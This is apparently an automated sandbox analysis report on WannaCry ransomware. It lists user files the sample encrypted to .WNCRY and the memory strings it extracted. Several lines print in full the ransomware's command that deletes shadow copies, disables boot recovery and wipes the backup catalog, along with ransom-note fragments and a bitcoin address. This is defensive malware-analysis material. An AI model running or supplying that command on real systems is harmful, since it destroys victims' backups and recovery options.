                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\LocalState\DiagOutputDir\XboxGamingOverlayTraces_20220120085256.txt.WNCRY (copy) entropy: 7.99936251983Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\LocalState\DiagOutputDir\XboxGamingOverlayTraces_20220223140416.txt.WNCRY (copy) entropy: 7.99923580578Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\LocalState\DiagOutputDir\XboxGamingOverlayTraces_20230515092412.txt.WNCRY (copy) entropy: 7.99954782409Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{0198c997-e97f-4abf-80d2-d72195f4ab04}\appsglobals.txt.WNCRY (copy) entropy: 7.99944357781Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{0198c997-e97f-4abf-80d2-d72195f4ab04}\appssynonyms.txt.WNCRY (copy) entropy: 7.99927921284Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\LocalState\DiagOutputDir\XboxGamingOverlayTraces_FT_Server_20210930121453.txt.WNCRY (copy) entropy: 7.99257596064Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\LocalState\DiagOutputDir\XboxGamingOverlayTraces_FT_Server_20220223140416.txt.WNCRY (copy) entropy: 7.993655518Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\LocalState\DiagOutputDir\XboxGamingOverlayTraces_FT_Server_20230515092412.txt.WNCRY (copy) entropy: 7.99764288179Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{25c88262-a7ab-45f7-85e7-7f8697edee0f}\0.0.filtertrie.intermediate.txt.WNCRY (copy) entropy: 7.99536048928Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{5a1caf4e-992d-4eb4-b7f3-9cfc9fd49e6a}\0.0.filtertrie.intermediate.txt.WNCRY (copy) entropy: 7.99486634929Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{ffa119a7-1647-4b3c-8c37-1046f5a858f2}\0.0.filtertrie.intermediate.txt.WNCRY (copy) entropy: 7.99529194446Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{0198c997-e97f-4abf-80d2-d72195f4ab04}\appsconversions.txt.WNCRY (copy) entropy: 7.99987283047Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{0198c997-e97f-4abf-80d2-d72195f4ab04}\settingsconversions.txt.WNCRY (copy) entropy: 7.99969835961Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{0198c997-e97f-4abf-80d2-d72195f4ab04}\settingsglobals.txt.WNCRY (copy) entropy: 7.99606755907Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{0198c997-e97f-4abf-80d2-d72195f4ab04}\settingssynonyms.txt.WNCRY (copy) entropy: 7.99829496617Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{d33fc00a-caf3-45c1-9fbf-c4db6e8b3d32}\0.0.filtertrie.intermediate.txt.WNCRY (copy) entropy: 7.99925438629Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{fd8f40a4-ac14-48d6-9ef0-afd19dd2a012}\0.0.filtertrie.intermediate.txt.WNCRY (copy) entropy: 7.99915256324Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_10[1].txt.WNCRY (copy) entropy: 7.99910724454Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_11[1].txt.WNCRY (copy) entropy: 7.99522164688Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_12[1].txt.WNCRY (copy) entropy: 7.99923557165Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_13[1].txt.WNCRY (copy) entropy: 7.99658852005Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_15[1].txt.WNCRY (copy) entropy: 7.99865279881Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_16[1].txt.WNCRY (copy) entropy: 7.99812943656Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_18[1].txt.WNCRY (copy) entropy: 7.99879826603Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_19[1].txt.WNCRY (copy) entropy: 7.99866035771Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_20[1].txt.WNCRY (copy) entropy: 7.99729696186Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_21[1].txt.WNCRY (copy) entropy: 7.99593774407Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_22[1].txt.WNCRY (copy) entropy: 7.99891268405Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_24[1].txt.WNCRY (copy) entropy: 7.99518345101Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_25[1].txt.WNCRY (copy) entropy: 7.99579452207Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_26[1].txt.WNCRY (copy) entropy: 7.99980132208Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_27[1].txt.WNCRY (copy) entropy: 7.99798692127Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_28[1].txt.WNCRY (copy) entropy: 7.99902849922Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_29[1].txt.WNCRY (copy) entropy: 7.99009081156Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_2[1].txt.WNCRY (copy) entropy: 7.99763460399Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_4[1].txt.WNCRY (copy) entropy: 7.99089203949Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_6[1].txt.WNCRY (copy) entropy: 7.99534123292Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_7[1].txt.WNCRY (copy) entropy: 7.99886185801Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_8[1].txt.WNCRY (copy) entropy: 7.99672373611Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_9[1].txt.WNCRY (copy) entropy: 7.99714354794Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Documents and Settings\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{730830dd-534f-42c8-8160-bd245bf51290}\0.0.filtertrie.intermediate.txt.WNCRY (copy) entropy: 7.99442180692Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Documents and Settings\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133286129748497427.txt.WNCRY (copy) entropy: 7.99823243673Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Documents and Settings\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835233[[fn=Text Sidebar (Annual Report Red and Black design)]].docx.WNCRY (copy) entropy: 7.99557312895Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Documents and Settings\user\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1024_768_POS4.jpg.WNCRY (copy) entropy: 7.99596155504Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Documents and Settings\user\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1920_1080_POS4.jpg.WNCRY (copy) entropy: 7.99850121057Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Temp\30.WNCRYT (copy) entropy: 7.99926954449Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133286130048509273.txt.WNCRY (copy) entropy: 7.99839584406Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133286130348618804.txt.WNCRY (copy) entropy: 7.99827750608Jump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1920_1080_POS4.jpg.WNCRY (copy) entropy: 7.99850121057Jump to dropped file
                  Contains functionalty to change the wallpaper
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 25_2_00407E80 SHGetFolderPathW,wcslen,swprintf,MultiByteToWideChar,CopyFileW,SystemParametersInfoW,25_2_00407E80
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 28_2_00407E80 SHGetFolderPathW,wcslen,swprintf,MultiByteToWideChar,CopyFileW,SystemParametersInfoW,28_2_00407E80
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 37_2_00407E80 SHGetFolderPathW,wcslen,swprintf,MultiByteToWideChar,CopyFileW,SystemParametersInfoW,37_2_00407E80
                  Deletes shadow drive data (may be related to ransomware)
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic shadowcopy delete
                  Source: WannaCrypt0r.sk, 00000005.00000003.4342275921.00000000008AC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
                  Source: WannaCrypt0r.sk, 00000005.00000003.4342275921.00000000008AC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: A%s %scmd.exe/c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietvscofi13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94Englishm_%s.wnrymsg\<https://<http://%d/%d/%d %02d:%02d:%02d00;00;00;00http://www.btcfrog.com/qr/bitcoinPNG.php?address=%smailto:%shttps://www.google.com/search?q=how+to+buy+bitcoinhttps://en.wikipedia.org/wiki/BitcoinSend %.1f BTC to this address:%.1f BTCSend $%d worth of bitcoin to this address:$%d%02d;%02d;%02d;%02d***b.wnry+++---%s%s%d%I64d%dFailed to send your message!
                  Source: WannaCrypt0r.sk, 00000005.00000003.3016294775.0000000000870000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
                  Source: WannaCrypt0r.sk, 00000005.00000003.3016294775.0000000000870000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: A%s %scmd.exe/c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietvscofi13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94Englishm_%s.wnrymsg\<https://<http://%d/%d/%d %02d:%02d:%02d00;00;00;00http://www.btcfrog.com/qr/bitcoinPNG.php?address=%smailto:%shttps://www.google.com/search?q=how+to+buy+bitcoinhttps://en.wikipedia.org/wiki/BitcoinSend %.1f BTC to this address:%.1f BTCSend $%d worth of bitcoin to this address:$%d%02d;%02d;%02d;%02d***b.wnry+++---%s%s%d%I64d%dFailed to send your message!
                  Source: WannaCrypt0r.sk, 00000005.00000003.3030888426.0000000000876000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
                  Source: WannaCrypt0r.sk, 00000005.00000003.3030888426.0000000000876000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: A%s %scmd.exe/c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietvscofi13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94Englishm_%s.wnrymsg\<https://<http://%d/%d/%d %02d:%02d:%02d00;00;00;00http://www.btcfrog.com/qr/bitcoinPNG.php?address=%smailto:%shttps://www.google.com/search?q=how+to+buy+bitcoinhttps://en.wikipedia.org/wiki/BitcoinSend %.1f BTC to this address:%.1f BTCSend $%d worth of bitcoin to this address:$%d%02d;%02d;%02d;%02d***b.wnry+++---%s%s%d%I64d%dFailed to send your message!
                  Source: WannaCrypt0r.sk, 00000005.00000003.3370890950.00000000008A3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
                  Source: WannaCrypt0r.sk, 00000005.00000003.3370890950.00000000008A3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: A%s %scmd.exe/c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietvscofi13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94Englishm_%s.wnrymsg\<https://<http://%d/%d/%d %02d:%02d:%02d00;00;00;00http://www.btcfrog.com/qr/bitcoinPNG.php?address=%smailto:%shttps://www.google.com/search?q=how+to+buy+bitcoinhttps://en.wikipedia.org/wiki/BitcoinSend %.1f BTC to this address:%.1f BTCSend $%d worth of bitcoin to this address:$%d%02d;%02d;%02d;%02d***b.wnry+++---%s%s%d%I64d%dFailed to send your message!
                  Source: WannaCrypt0r.sk, 00000005.00000003.3037184208.000000000087B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: /c vssadmin delete shadows /all /quiet &
                  Source: WannaCrypt0r.sk, 00000005.00000003.3037184208.000000000087B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: A%s %scmd.exe/c vssadmin delete shadows /all /quiet &
                  Source: @WanaDecryptor@.exeBinary or memory string: /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
                  Source: @WanaDecryptor@.exe, 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmpBinary or memory string: /c vssadmin delete shadows /all /quiet &
                  Source: @WanaDecryptor@.exe, 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmpBinary or memory string: A%s %scmd.exe/c vssadmin delete shadows /all /quiet &
                  Source: @WanaDecryptor@.exe, 00000019.00000000.4343624168.000000000041F000.00000008.00000001.01000000.00000009.sdmpBinary or memory string: /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
                  Source: @WanaDecryptor@.exe, 00000019.00000000.4343624168.000000000041F000.00000008.00000001.01000000.00000009.sdmpBinary or memory string: A%s %scmd.exe/c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietvscofi13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94Englishm_%s.wnrymsg\<https://<http://%d/%d/%d %02d:%02d:%02d00;00;00;00http://www.btcfrog.com/qr/bitcoinPNG.php?address=%smailto:%shttps://www.google.com/search?q=how+to+buy+bitcoinhttps://en.wikipedia.org/wiki/BitcoinSend %.1f BTC to this address:%.1f BTCSend $%d worth of bitcoin to this address:$%d%02d;%02d;%02d;%02d***b.wnry+++---%s%s%d%I64d%dFailed to send your message!
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietJump to behavior
                  Source: @WanaDecryptor@.exeBinary or memory string: /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
                  Source: @WanaDecryptor@.exe, 0000001C.00000002.4450951579.0000000000595000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Users\user\Desktop\C:\Windows\SysWOW64\cmd.execmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietC:\Windows\S\Registry\Machine\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion\GRE_InitializeALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\RoamingCommonProgramFiles=C:\Program Files\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=computerComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\computerNUMBER_OF_PROCESSORS=16OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM\Registry\Machine\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion\GRE_InitializeIDENTIFIER=IG
                  Source: @WanaDecryptor@.exe, 0000001C.00000000.4347439754.000000000041F000.00000008.00000001.01000000.00000009.sdmpBinary or memory string: /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
                  Source: @WanaDecryptor@.exe, 0000001C.00000000.4347439754.000000000041F000.00000008.00000001.01000000.00000009.sdmpBinary or memory string: A%s %scmd.exe/c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietvscofi13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94Englishm_%s.wnrymsg\<https://<http://%d/%d/%d %02d:%02d:%02d00;00;00;00http://www.btcfrog.com/qr/bitcoinPNG.php?address=%smailto:%shttps://www.google.com/search?q=how+to+buy+bitcoinhttps://en.wikipedia.org/wiki/BitcoinSend %.1f BTC to this address:%.1f BTCSend $%d worth of bitcoin to this address:$%d%02d;%02d;%02d;%02d***b.wnry+++---%s%s%d%I64d%dFailed to send your message!
                  Source: @WanaDecryptor@.exe, 0000001C.00000002.4450175484.000000000019B000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: ^mu/c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
                  Source: @WanaDecryptor@.exe, 0000001C.00000002.4450175484.000000000019B000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: ]|vcmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
                  Source: @WanaDecryptor@.exe, 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmpBinary or memory string: /c vssadmin delete shadows /all /quiet &
                  Source: @WanaDecryptor@.exe, 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmpBinary or memory string: A%s %scmd.exe/c vssadmin delete shadows /all /quiet &
